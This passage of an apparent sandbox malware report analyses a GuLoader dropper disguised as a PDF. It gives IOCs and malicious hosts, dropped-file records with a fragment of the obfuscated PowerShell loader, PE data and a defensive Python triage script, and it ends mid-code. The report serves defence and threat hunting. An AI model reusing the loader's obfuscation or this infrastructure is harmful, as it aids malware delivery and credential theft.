                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6508 because it is empty
    • Not all processes were analyzed, report is missing behavior information
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: Pago SEPA.pdf.exe
    Time | Type | Description
    11:20:05 | API Interceptor | 39x Sleep call for process: powershell.exe modified
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    104.168.32.140 | Payment Receipt Attached PDF.exe | malicious | GuLoader | 104.168.32.140/hgzYyfcbupQbJOAKN230.bin
    104.168.32.140 | Payment Receipt Attached PDF.exe | malicious | GuLoader | 104.168.32.140/hgzYyfcbupQbJOAKN230.bin
    162.55.60.2 | Lista de cotizaciones.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | New Order___________pdf.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | Payment Receipt Attached PDF.exe | malicious | GuLoader | showip.net/
    162.55.60.2 | Payment Receipt Attached PDF.exe | malicious | GuLoader | showip.net/
    162.55.60.2 | FCGF98760900.bat.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | 7rxE4s9EEG.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | fS5TEjVseD.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | Nvojocm.exe | malicious | DarkCloud | showip.net/
    162.55.60.2 | Documentos_xlsm.exe | malicious | DarkCloud | showip.net/
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    showip.net | Lista de cotizaciones.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | New Order___________pdf.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
    showip.net | Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
    showip.net | FCGF98760900.bat.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | 7rxE4s9EEG.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | fS5TEjVseD.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | Nvojocm.exe | malicious | DarkCloud | 162.55.60.2
    showip.net | Documentos_xlsm.exe | malicious | DarkCloud | 162.55.60.2
Match: AS-COLOCROSSINGUS
Associated Sample Name / URL | Detection | Threat Name | Context
Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 107.172.44.175
EIesXTUPI9.exe | malicious | Remcos | 198.46.178.152
OrderBJ 02 - JUNMA016118313306,pdf.exe | malicious | Remcos | 198.46.178.152
https://neveshost.com.br/molkdp/BWjGZ/Y2hhcmxlcy5mZXJyeUBicmV3aW4uY28udWs= | malicious | HTMLPhisher | 107.175.48.9
Quotation.exe | malicious | Remcos | 23.95.60.82
2024-HRDCL-0000796.xls | malicious | Unknown | 198.23.212.233
Contrato firmado y factura proforma.xls | malicious | HTMLPhisher | 107.173.4.61
2024-HRDCL-0000796.xls | malicious | Unknown | 198.23.212.233
2024-HRDCL-0000796.xls | malicious | Unknown | 198.23.212.233
Order_Confirmation.xls | malicious | Remcos, HTMLPhisher | 192.227.228.36

Match: ACPCA
Associated Sample Name / URL | Detection | Threat Name | Context
Hire P.O.exe | malicious | FormBook | 162.0.211.143
Lista de cotizaciones.exe | malicious | DarkCloud | 162.55.60.2
New Order___________pdf.exe | malicious | DarkCloud | 162.55.60.2
x86.elf | malicious | Mirai | 162.52.29.90
http://www.skyunitedlc.com | malicious | Unknown | 162.0.217.112
Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
Payment Receipt Attached PDF.exe | malicious | GuLoader | 162.55.60.2
Order.exe | malicious | FormBook | 162.0.211.143
FCGF98760900.bat.exe | malicious | DarkCloud | 162.55.60.2
fHkdf4WB7zhMcqP.exe | malicious | FormBook | 162.0.211.143
                                                                    No context
                                                                    No context
Dropped file
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: modified
  Size (bytes): 14744
  Entropy (8bit): 4.992175361088568
  Encrypted: false
  SSDEEP: 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
  MD5: A35685B2B980F4BD3C6FD278EA661412
  SHA1: 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
  SHA-256: 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
  SHA-512: 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
  Malicious: false
  Reputation: moderate, very likely benign file
  Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
The PSMODULECACHE header identifies PowerShell's module analysis cache, which powershell.exe updates on any ordinary run; it is a by-product of the PowerShell stage, not a payload.
Dropped file
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: ASCII text, with no line terminators
  Category: dropped
  Size (bytes): 60
  Entropy (8bit): 4.038920595031593
  Encrypted: false
  SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
  SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
  Malicious: false
  Reputation: high, very likely benign file
  Preview: # PowerShell test file to determine AppLocker lockdown mode
This record appears four times in the report with identical content and hashes (two of the four copies also carry the Reputation line). PowerShell writes this 60-byte test script at start-up to check whether AppLocker enforces script rules, so it is expected on any host that runs powershell.exe and is not an indicator of the malware.
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: data
  Category: dropped
  Size (bytes): 344097
  Entropy (8bit): 7.64995625789049
  Encrypted: false
  SSDEEP: 6144:znesaTJqZA6na278gPrgPh/gsoUoK0UWnbMrgun7qKUccD7pZiqrrUmnxak:zesnT78wkPh/g6oK0pnbMrz7qKnsiqnB
  MD5: 2C424CAE6C5151E14972C2D296C15D9C
  SHA1: 69AF0E2F3B9EEDDDE6083F912B392A7A603FB423
  SHA-256: 36BEADD390D0760A31FECFF3BC131BD3BF60C9D0EC58EF02FB0332F4E1CD6FB3
  SHA-512: C155F03F8B26789ED233081C6923B32AF091A9E6D4E08D4F53C3ED69E2E7DC22B2C56290E69CEAE41406C1030C5DBFFD9D462D8B45DC8F5099A499002B4DDC81
  Malicious: false
  Preview: ............_.....................++...;;;...?.............K........aa.....................pppp.ee...........M..........7..........................AAA.............WWWWW..KK..uuu....JJJ.......bb....00....~...1..=.P.5.................(((.B.................\\.............V.^.........J............e....3....rr...pp....~~~~~~~~.....uu.........................'......#.....\........................`....M...;..............................qq............."".11.dd.......y............B...............N......................s..ggggg................<.GG........................-..&.......t............WWWWW.......QQQQ...s......K...q.,......oo...........R..DDD.....F..............P......X.....................O............_.(.....kk........>..........44..........WW.......n...b.................9...........................P........2222.>..........................""".D.((.....**......wwww........++........a................d..uuu.................F...l....B....................."........../................K...8.
At 7.65 bits per byte the content is close to random, which is what compressed or encrypted data looks like; the report does not identify the format and did not classify the file as malicious.
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: ASCII text, with very long lines (4231), with CRLF, LF line terminators
  Category: dropped
  Size (bytes): 73806
  Entropy (8bit): 5.193743489540079
  Encrypted: false
  SSDEEP: 1536:dCSSk6sxRTKTSOIgcT1dwmuWlZ9ONMMB3GxrcTx6nQRH0ZIOv0J8P:dTSkj8rY1emJs12BUimHYv0S
  MD5: E3465E56AA31BA3C7537182104B88658
  SHA1: A6CA93391BE1ECF14C0DD5621D2531988B4D04D7
  SHA-256: 4DE3C8BF7CC1939525B031D2B2AFB13E40B69581DC81B5265EA9A252E1CB57AA
  SHA-512: C993F0378B19BDAD10298C53BF816AF15A7CA415BAD46E691FDA3DFC26FA480A2CDC69BAD0280E53CC6C24BDCC19723212E96AE949317588EF8BF7C67A5FDD49
  Malicious: false
  Preview: $Telefonliniernes248=$Opdagelsen;..<#Committitur Eyedot Uforudsigelighedens undertonens Lnpotsystem Dissite #>..<#Antipodisten pileate Fructuate #>..<#Unpredictive Stratifikation Formgivernes #>..<#Tachylite Ministeriet Blndvrket Sponsorskabernes Reprofotogafis Hjortenes Duggen #>..<#Wearily Ekviperingshandleren mourneress Localizers Overfladetemperaturens Rayonen Ghaneserne #>..<#Indtgtsforgelsernes Slimer Finansmarkedet Dommerkontorer Kalken Hortonomer #>...$antimerina = @'.Konsekv.Middelv$CulverwMFiksvurupresealrsnoringe driftssSl ngri=Deceler$pleistoNFluorido Jazzgur GlpetisSkregdie Gendigm ealloe ksercinK lonis;Damning.Burnettf vidtluEvitabinLnnenswcElektrit QuodliiFarvefio SystemnS emmel Inte suKForvildnDuffelue Indbetbbicyclel IndtjeefoxingsnPa skebsAlterca Wol,ram(Flerspa$RypesflAVi,neanrTorilsrt uffabeCog,ncerExscissi jokke o al.ertpCutenesrDuelleneOvermics Sacc osCoconspoVagoglor Trldom,Sydafri$retsmedVSolveise EjegodrGrundstsBe.rbejiOctaviof Transfi Squ.ezkScap loaCremefr
The preview is PowerShell: variable assignments, block comments (<# ... #>) stuffed with filler words, and a here-string (@') of filler text with no readable code in the first kilobytes. This is the kind of script the overview's "Found suspicious powershell code related to unpacking or dynamic code loading" signature refers to; the readable logic only appears once the filler is removed at run time.
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: data
  Category: dropped
  Size (bytes): 464393
  Entropy (8bit): 1.2531283911918274
  Encrypted: false
  SSDEEP: 1536:lbk1LH6GMgXzqftFrKcCFJrNI0DZgzXheDiUKfIXBd66GBG:lkZ6QXzqftocAJrNI0U066Gs
  MD5: 334C7F837A0F72E41601057332C603C9
  SHA1: D1D92486F8E198AF7061C9A0D1A58581DDE0F996
  SHA-256: 5AB0038204E3CBEF3FD931858908121176CD57F84A551681552707EB1ABFA59A
  SHA-512: 52D077B6E8AB2FFD1CE9E018D1FCE59EA48F22B8716BB6DEC77A71238F0810156760B96A4A434C05C809983AC36A400FAB0375CD72697F5E7171DB6E0F3DE52D
  Malicious: false
  Preview: /..............8................................................g.............$....................I.+............R........I............................................................s................................................[.................................(....................... .............................................................................................f.......................................... .....................................P......%.........................0..[..............:................................h...s....................U................~.m...g..............[......................$..............S8...._.............................\...........................................................................)................................................#............................6........................................o........................Z.U..........................................................................................
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: ASCII text, with very long lines (311), with CRLF line terminators
  Category: dropped
  Size (bytes): 642
  Entropy (8bit): 4.2618592933727895
  Encrypted: false
  SSDEEP: 12:T34a0JU/GsgjI2J7rQi9vbRe0PSf0mZTFN+7z27Fz/Ek7Zg0UY+EkDZ:T34a0JU/VYRJ7ki9v1rmZT+W7FzMk7Zq
  MD5: 045784AE6140B6244AD605A99A3AB908
  SHA1: A7F43F2AC40159500446056DB1C4C1D78F0C077D
  SHA-256: 667A103A45337560380E63659AAD2BBBDFFD0AD9ADFBCBC9E771FA0A62CB8A4D
  SHA-512: 1BB0882E7BF868753154AD0037BC7476484743B3755BC148E372A84C9EA82F683DFA669FCB0383B9705678EBE478E20C6D51FEE572E5C9B5CF08B0957789B525
  Malicious: false
  Preview: flueben lallygag studiestarters dolkhalens undraping uncreatedness,discandy allowedly teskefuldenes troldskovenes.forsmmelig fartovertrdelser nedspring numb isogram slavebindes falkonererne.reificeredes kmmendes holmberry starttidspunkter outscolds ethoxide bjlkerne fejlarkiveringerne autogravure transmaterial..ravishedly administrationsdepartements safians reasserted lejdets decentralisationist diskettepakker execratory malerkunsternes uregelmssigheds filatelisters faginspektrer andagtsfulde..galactolipide sydlndinge iblandende threaded protovestiary tjle cocuswood rohirrim pangful fotokemisk metasymbol staaltraadsnettene fluidizes..
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: data
  Category: dropped
  Size (bytes): 74507
  Entropy (8bit): 1.23735759293295
  Encrypted: false
  SSDEEP: 384:QBTulxdphSS9mcIE5JeQrqaaMgjdK4hfYUaNuUE/sIzisU2bG+6:QBs9uE5jlasv3cw0GN
  MD5: A959E5A5FD15840C3A0C589620A29FA4
  SHA1: FAE450E740C69AA7D2486F7A9ACAE6912B1A0B4A
  SHA-256: 74F8506CDF0FC211B9ABB284EC7B6F608D155B3B5060287F773ABE80822AB3D3
  SHA-512: 88269F17FCEB7222D222C277FB0E1BD8C873743FF36BB45287CB5BA907429CD1EDF17089BA17CA80377D86B87974421CC083D457A46BD9098C9FD5B007674B72
  Malicious: false
  Preview: .............`..xQ............................................(.............................................4.........................................r.......................................................................................k.......................................`.................................y...K........................$..}.......P........................H..........................................................................................K............................:..............................b........c..............................................................................$...................-.......................................}................................................................................0..........................................................y............... .................................v..................."...............................b.............U................................................................i..
Dropped file
  Process: C:\Users\user\Desktop\Pago SEPA.pdf.exe
  File Type: data
  Category: dropped
  Size (bytes): 80491
  Entropy (8bit): 1.2545072626113274
  Encrypted: false
  SSDEEP: 768:muoKeVhQXbD23MaW0pIw72HSQAwG5ih+b:ZeAuq+b
  MD5: A16B4C5B79E878C5721C8A6C5A268534
  SHA1: 6DD40143064AC09F0B1A56F2506CADC99CB8408B
  SHA-256: CF500A247199A2A63E13AF82AA1AD2A480474D7657BE235920FA0BB49525E73B
  SHA-512: 5F4A4B0C46613D19105151876E3DD43FBC2D15BDB5777F51C0FF2DC2B96130E0182088CFE2EAECB0E0EB4431A5E9F3167370F92CE51CE9CB9AD172282B2C21E7
  Malicious: false
  Preview: ......................................................................................+.............................u..................................................4..................n.......................................................................@.....................................................................................s..'................{...................6n.........................................................................................5.......M...................(...........................[............9..............&........................................................v.....................................................2........<z..............=................."...........".S........................W.......................................................r...............................................E.................................h...................................................K.........................................................
Dropped file
  Process: C:\Windows\SysWOW64\msiexec.exe
  File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
  Category: dropped
  Size (bytes): 51200
  Entropy (8bit): 0.8746135976761988
  Encrypted: false
  SSDEEP: 96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
  MD5: 9E68EA772705B5EC0C83C2A97BB26324
  SHA1: 243128040256A9112CEAC269D56AD6B21061FF80
  SHA-256: 17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
  SHA-512: 312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
  Malicious: false
  Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
The Windows Installer service has no reason of its own to write SQLite databases. Together with the overview's "Msiexec Initiated Connection" and "Tries to harvest and steal browser information" findings, this is consistent with the injected payload running inside msiexec.exe and copying browser data stores (Chromium's credential and history stores are SQLite files); the two databases here are worth opening in a SQLite viewer to confirm what was collected.
Dropped file
  Process: C:\Windows\SysWOW64\msiexec.exe
  File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
  Category: dropped
  Size (bytes): 196608
  Entropy (8bit): 1.121297215059106
  Encrypted: false
  SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
  MD5: D87270D0039ED3A5A72E7082EA71E305
  SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
  SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
  SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
  Malicious: false
  Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
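The dropped-file records above are the part of the report an analyst usually turns into indicators, and the "Entropy (8bit)" field is what separates the two kinds of artifact the sample leaves behind (near-random blobs versus filler text). The following is an added example, not part of the report and not Joe Sandbox code: it parses the flattened "Key:Value" records exactly as they appear on this page, recomputes the 8-bit Shannon entropy behind the "Entropy (8bit)" field, classifies each record, and emits the SHA-256 values worth hunting for. The record text is copied from this report (previews shortened); the verdict threshold of 7.0 bits per byte, the list of known-benign markers and the trailing space in the AppLocker test file content (inferred from the report's 60-byte size and its entropy value, since the preview shows only 59 characters) are assumptions.

```python
"""Triage of the Dropped Files records of a Joe Sandbox report (added example)."""
import math
from collections import Counter

SAMPLE_PROCESS = r"C:\Users\user\Desktop\Pago SEPA.pdf.exe"

# Three records copied from this report; Preview values cut short.
REPORT_EXCERPT = r"""
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\Pago SEPA.pdf.exe
File Type:data
Category:dropped
Size (bytes):344097
Entropy (8bit):7.64995625789049
MD5:2C424CAE6C5151E14972C2D296C15D9C
SHA-256:36BEADD390D0760A31FECFF3BC131BD3BF60C9D0EC58EF02FB0332F4E1CD6FB3
Malicious:false
Preview:............_........
Process:C:\Users\user\Desktop\Pago SEPA.pdf.exe
File Type:ASCII text, with very long lines (4231), with CRLF, LF line terminators
Category:dropped
Size (bytes):73806
Entropy (8bit):5.193743489540079
MD5:E3465E56AA31BA3C7537182104B88658
SHA-256:4DE3C8BF7CC1939525B031D2B2AFB13E40B69581DC81B5265EA9A252E1CB57AA
Malicious:false
Preview:$Telefonliniernes248=$Opdagelsen;..<#Committitur Eyedot #>..$antimerina = @'
"""

# 60-byte content of the AppLocker test file. Assumption: the preview shows 59
# visible characters; the report's size and entropy are reproduced only with a
# trailing space.
APPLOCKER_TEST_CONTENT = b"# PowerShell test file to determine AppLocker lockdown mode "

# Assumption: markers of artifacts every PowerShell run leaves behind.
KNOWN_BENIGN_MD5 = {
    "D17FE0A3F47BE24A6453E9EF58C94641": "PowerShell AppLocker policy test script",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the metric the report calls 'Entropy (8bit)':
    0.0 for a constant byte stream, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_dropped_files(text: str) -> list[dict]:
    """Each 'Process:' line starts a new record. Keys are split on the first
    ':' only, because values (paths, previews) contain colons themselves."""
    records, current = [], None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def triage(rec: dict, sample_process: str = SAMPLE_PROCESS) -> tuple[str, str]:
    """Verdict for one record: 'benign', 'review' or 'info', plus the reason."""
    if rec.get("MD5", "").upper() in KNOWN_BENIGN_MD5:
        return "benign", KNOWN_BENIGN_MD5[rec["MD5"].upper()]
    if rec.get("Preview", "").startswith("PSMODULECACHE"):
        return "benign", "PowerShell module analysis cache"
    by_sample = rec.get("Process", "").lower() == sample_process.lower()
    entropy = float(rec.get("Entropy (8bit)", "0") or 0)
    if by_sample and entropy >= 7.0:  # assumption: threshold for packed/encrypted data
        return "review", "high-entropy blob written by the sample (compressed or encrypted payload)"
    if by_sample and "text" in rec.get("File Type", "").lower():
        return "review", "script or text written by the sample"
    if by_sample:
        return "review", "file written by the sample"
    return "info", "written by a helper process"


def sha256_iocs(records: list[dict], sample_process: str = SAMPLE_PROCESS) -> list[str]:
    """SHA-256 of every record that needs review, sorted, as a hunting list."""
    return sorted(r["SHA-256"] for r in records
                  if "SHA-256" in r and triage(r, sample_process)[0] == "review")


if __name__ == "__main__":
    recs = parse_dropped_files(REPORT_EXCERPT)
    for r in recs:
        verdict, why = triage(r)
        print(f"{verdict:6} {r['SHA-256'][:16]}...  {why}")
    print("IOCs:", sha256_iocs(recs))
    print("AppLocker test file entropy:", shannon_entropy(APPLOCKER_TEST_CONTENT))
```

Run against the full report text, the same parser yields one record per dropped file; the only fields the classification needs are Process, MD5, File Type, Entropy (8bit) and Preview, so it tolerates records that lack the Reputation line.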
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.908117063854728
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Pago SEPA.pdf.exe
File size: 570'654 bytes
MD5: b09a414939191d7f43c114c02726ddb9
SHA1: 2f9c6fef4c2a1b62e483a2cc70da3fb181b22b82
SHA256: 32c90ef4f976a4da59bc95b23141547372640b04840e496852e80ee03c81b284
SHA512: d18015b43292f7cabde6bbec00044b5baef26ac4fe80fd089c228011c9ccb45cc1eafd561a1cbda082a4b737ca58ab5f46584e7c5da05b3665a61d3551ae4587
SSDEEP: 12288:/BvLTWCL5BqTvUDO2sybP4Xpg2Y/+SdKGXQb72RJqIix+XMA34:RhTqTGPP4Xa2Y/+gHXm72JqIMAMAo
TLSH: 7BC4229036E0C93AC5AB1F711DB2F23CEA7B9D890C749A4B9B257F3F75363844A01619
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...s..V.................`...*.....
Icon Hash: 342707b371253d5d
Entrypoint: 0x40326a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x567F8473 [Sun Dec 27 06:25:55 2015 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d4b94e8ee3f620a89d114b9da4b31873

Notes on the static data above: the executable is the generic NSIS installer stub, so its PE timestamp is the build time of the prebuilt stub that makensis copies into every installer, not the time this sample was produced; do not use it to date the campaign. For the same reason the import hash identifies the NSIS stub, not GuLoader. The whole-file entropy of 7.91 bits/byte is well above that of any section listed further down, because the bulk of the file is the compressed NSIS archive appended after the sections, which is where the installer script and the GuLoader payload live.
Entrypoint disassembly (first instructions at 0x40326a in .text). This prologue matches the standard NSIS installer stub: every `call dword ptr [00407xxxh]` targets the IAT at 0x407000-0x4072b8, and nothing GuLoader-specific is present here.

sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 00409300h
mov dword ptr [esp+18h], ebp
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F4A8C840093h
push ebp
call 00007F4A8C8431D6h
cmp eax, ebp
je 00007F4A8C840089h
push 00000C00h
call eax
push ebx
push edi
push 004092F4h
call 00007F4A8C843153h
push 004092ECh
call 00007F4A8C843149h
push 004092E0h
call 00007F4A8C84313Fh
push 00000009h
call 00007F4A8C8431A4h
push 00000007h
call 00007F4A8C84319Dh
mov dword ptr [00429224h], eax
call dword ptr [00407044h]
push ebp
call dword ptr [004072A8h]
mov dword ptr [004292D8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 004206C8h
call dword ptr [0040718Ch]
push 004092C8h
push 00428220h
call 00007F4A8C842D8Ah
call dword ptr [004070A8h]
mov ebx, 00434000h
push eax
push ebx
call 00007F4A8C842D78h
push ebp
call dword ptr [00407178h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories:

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74bc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0x17fe0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Two things worth reading off this table: the empty SECURITY directory confirms there is no Authenticode signature (Digitally signed: false above), and the empty BASERELOC directory together with RELOCS_STRIPPED means the DYNAMIC_BASE flag is ineffective, since the loader has no relocations to apply; the image runs at its preferred base 0x400000, which is why the entrypoint disassembly uses absolute 0x0040xxxx addresses.
Sections:

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ffa | 0x6000 | df2f822ba33541e61d4a603b60bbdbcc | False | 0.6675211588541666 | data | 6.472885474718374 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1370 | 0x1400 | a10c5fabf76461b1b26713fde2284808 | False | 0.4404296875 | data | 5.0714431097950134 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x20318 | 0x600 | 45bc104aba688d708375b6b0133d1563 | False | 0.5084635416666666 | data | 3.9955723529870646 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x49000 | 0x17fe0 | 0x18000 | f5f48175d2a1c5c8ef717e49c06c7188 | False | 0.8235982259114584 | data | 7.340960013048418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

The .ndata section is NSIS's own uninitialised-data area (raw size 0, so its MD5 is simply the MD5 of empty input). The raw sizes add up to 0x1fa00 (129,536) bytes; with the headers that leaves roughly 440 KB of the 570'654-byte file outside every section. That overlay is the appended NSIS archive, which is why the payload does not show up in any section here.
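The section table is enough to reproduce two of the report's derived columns and to locate where the payload is not. The block below is an added example, not code from Joe Sandbox or from the sample: it transcribes the table, maps an RVA to its section the way the "Is in Section" column does, computes the same 8-bit Shannon entropy the "Entropy" column reports, and subtracts headers plus section raw sizes from the file size to measure the overlay. HEADER_SIZE = 0x400 is an assumption, because the report does not print the raw offset of the first section.

```python
import math
from collections import Counter

# Section table as printed in this report (transcribed by hand, not parsed from the binary):
# (name, virtual address, virtual size, raw size, entropy)
SECTIONS = [
    (".text",  0x1000,  0x5ffa,  0x6000,  6.472885474718374),
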